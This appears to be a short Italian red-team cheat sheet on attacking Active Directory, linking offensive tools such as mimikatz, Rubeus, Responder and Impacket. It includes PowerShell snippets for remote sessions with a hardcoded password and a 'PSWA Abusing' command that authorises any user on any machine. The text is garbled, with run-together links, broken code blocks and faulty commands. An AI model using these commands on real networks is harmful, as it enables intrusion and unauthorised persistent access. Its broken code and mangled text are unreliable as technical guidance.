
Red Team Cheatsheet in continua espansione.

Puoi supportarmi qui 🐱 :
Questa CheatSheet sugli attacchi AD, creata da RistBS, è ispirata al repository Active-Directory-Exploitation-Cheat-Sheet.
Strumenti Powershell :
[⭐] Nishang -> https://github.com/samratashok/nishangnishang ha molteplici script utili per il pentesting di Windows in ambiente Powershell.
powerview è uno script di powersploit che consente l'enumerazione dell'architettura AD per un potenziale movimento laterale.
Strumenti di Enumerazione :
[⭐] Bloodhound -> https://github.com/BloodHoundAD/BloodHound[⭐] crackmapexec -> https://github.com/byt3bl33d3r/CrackMapExeToolkit per lo sfruttamento di AD :
[⭐] Impacket -> https://github.com/SecureAuthCorp/impacket[⭐] kekeo -> https://github.com/gentilkiwi/kekeoStrumenti di Dump :
[⭐] mimikatz -> https://github.com/gentilkiwi/mimikatz[⭐] rubeus -> https://github.com/GhostPack/RubeusStrumento Listener :
[⭐] responder -> https://github.com/SpiderLabs/ResponderPS-Session :```powershell #METHOD 1 $c = New-PSSession -ComputerName 10.10.13.100 -Authentication Negociate -Credential $user Enter-PSSession -Credential $c -ComputerName 10.10.13.100
$pass = ConvertTo-SecureString 'Ab!Q@aker1' -asplaintext -force $cred = New-Object System.Management.Automation.PSCredential('$user, $pass') Enter-PSSession -Credential $c -ComputerName 10.10.13.100
### PSWA Abusing
consente a chiunque abbia credenziali di connettersi a qualsiasi macchina e qualsiasi configurazione
**[ ! ] questa azione richiede credenziali.**```powershell
Add-PswaAuthorizationRule -UsernName * -ComputerName * -ConfigurationName *